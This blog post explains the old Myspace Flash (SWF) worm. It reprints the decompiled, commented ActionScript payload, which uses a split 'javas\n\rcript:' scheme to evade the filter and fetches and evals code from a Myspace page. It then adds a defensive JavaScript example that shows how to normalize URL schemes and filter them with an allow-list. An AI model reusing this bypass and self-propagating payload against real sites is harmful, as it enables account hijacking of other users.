Myspace SWF Hack – it works

Myspace users can use SWF (Flash movies) to build their layout. But a Flash movie can be more than a simple animation: it can run code, which is called ActionScript. While you are viewing someone's profile that contains such a Flash movie, profile data like your email address and password can be hijacked from your cookie and saved somewhere behind the scenes.

I recently came across a Digg story published by kinematic in which he described the Myspace hack technique. He actually decompiled an SWF file from Myspace to see its ActionScript, which revealed the secret of the hack. It is advanced JavaScript, called AJAX, that was used to hack.

When you visited an already infected page, there was an SWF embedded ("redirect.swf") which contained the ActionScript shown below. The raw script looks pretty obfuscated; however, when you space it out and add comments:

getURL("
javas\n\r
cript:
//this translates in the browser to: "javascript:"
//which myspace really should have blocked now.
var x = new ActiveXObject('Msxml2.XMLHTTP');
// loads a new xmlHTTP object, sets it as var "x"
x.open('GET','http://editprofile.myspace.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373',true);
// This opens yet another blog post, at the URL above. The text of the URL is below
x.onreadystatechange = function()
// when the readystate of the xmlHTTP object changes:
{
if (x.readyState==4)
// once the state changes to complete (it goes from 0 to 4, iirc)
{
var pg = x.responseText;
// the code it got from the page
var sc = pg.substring(pg.indexOf('BX-')+3,pg.indexOf('-EX'));
// loads into "sc" the contents of the response text from the place where
// the end of "BX-" (that's the +3) is first encountered up until it finds the start of
// "-EX"; this is all the nasty JS.
while ( (sc.indexOf('')!=-1) || (sc.indexOf('-XXX')!=-1) )
// while "sc" (the code) still contains "" or "-XXX":
{
var n=sc.indexOf('');
// n is the start of where it finds "" in "sc"
if (n==-1)
n=sc.indexOf('-XXX');
// if it can't find "", then make n where it can find "-XXX"

// this next bit was really quite clever: it manages to keep the > closing bracket for
// the embed tag, which it needs, and creates the embed tag by removing
// the XXX's and leaving the final character!
sc = sc.substring(0,n)+sc.substring(n+5,sc.length);
// sc is now from the start, to n,
// then add on to sc the bit from n+5 to the end of sc;
// essentially, this cuts out the crap from the blog post it pulls.
// the crap was in there in the first place to get past myspace's filters, I presume.
};
// this iterates through and removes the -XXX's from the blog post
" + "eval(sc);
// evaluate "sc" - this is what does it all.
} // end of readystate==4 "if"
}; //end of function
" //closing the quote from the SWF getURL() function
+
"
x.send(null);
// adds on sending "null" to the xmlHTTP object.
", ""
// no target, so it just executes.
);// end of SWF getURL function.

In essence, it pulls a blog post from somewhere else on Myspace and evaluates the code that it contains.
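The first lines of that script show what got the URL past the filter: the scheme is written as "javas\n\rcript:", which a plain prefix comparison does not recognise but a browser still resolves as javascript:. The following JavaScript is an added example, not code from the original post or from kinematic's write-up, showing why a naive check misses the split scheme and how a check that normalizes the way browsers do (stripping tab, newline and carriage return anywhere, stripping leading control characters, then lowercasing the scheme) catches it. The function names, the sample inputs and the http/https allow-list are assumptions made for this illustration.

```javascript
// Added example (not from the original post): check a URL's scheme the way a browser
// resolves it, so a split scheme such as "javas\n\rcript:" is not missed.
// Function names, sample inputs and the allow-list are assumptions for this illustration.

// Naive filter: compares the raw string prefix. "javas\n\rcript:" slips past it.
function naiveIsJavascriptUrl(url) {
  return String(url).toLowerCase().startsWith("javascript:");
}

// Normalize as the URL parser does before reading the scheme:
//  - strip ASCII tab, line feed and carriage return anywhere in the string,
//  - strip leading C0 control characters and spaces,
//  - take the scheme token up to the first ':' and lowercase it.
// Returns null when the string has no scheme (a relative URL).
function normalizedScheme(url) {
  const stripped = String(url)
    .replace(/[\t\n\r]/g, "")
    .replace(/^[\u0000-\u0020]+/, "");
  const m = /^([a-z][a-z0-9+.\-]*):/i.exec(stripped);
  return m ? m[1].toLowerCase() : null;
}

// Deny-list view: is this one of the schemes that executes script in the page?
function isScriptUrl(url) {
  const scheme = normalizedScheme(url);
  return scheme === "javascript" || scheme === "vbscript";
}

// Allow-list view (the safer policy for user-supplied links): accept only http(s)
// or scheme-less relative URLs and reject everything else, unknown schemes included.
function isAllowedLinkTarget(url) {
  const scheme = normalizedScheme(url);
  return scheme === null || scheme === "http" || scheme === "https";
}

// Constructed sample inputs, modelled on the split scheme used in the script above.
const SAMPLES = [
  "javas\n\rcript:alert(1)",
  "JaVaScRiPt:alert(1)",
  "\t javascript:alert(1)",
  "http://editprofile.myspace.com/index.cfm?fuseaction=user.HomeComments",
  "/index.cfm?fuseaction=user.viewprofile",
];

// Report what each check decides for every sample, so the gap in the naive filter is visible.
function compareChecks(urls = SAMPLES) {
  return urls.map((u) => ({
    url: u,
    naiveFlags: naiveIsJavascriptUrl(u),
    normalizedFlags: isScriptUrl(u),
    allowed: isAllowedLinkTarget(u),
  }));
}

for (const row of compareChecks()) {
  console.log(JSON.stringify(row));
}
```

The deny-list check is there to show the normalization step; the allow-list check is the policy to actually deploy for user-controlled link targets, since it does not need to know every scheme a browser might execute.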

If you are not a programmer you can't understand what it does. If you are infected, this script can modify your profile with whatever the attacker wants. In the same way, using the technique called cross-site scripting, an attacker can change your password or post bulletins to your friends without any action on your part. Myspace can't help you out on this.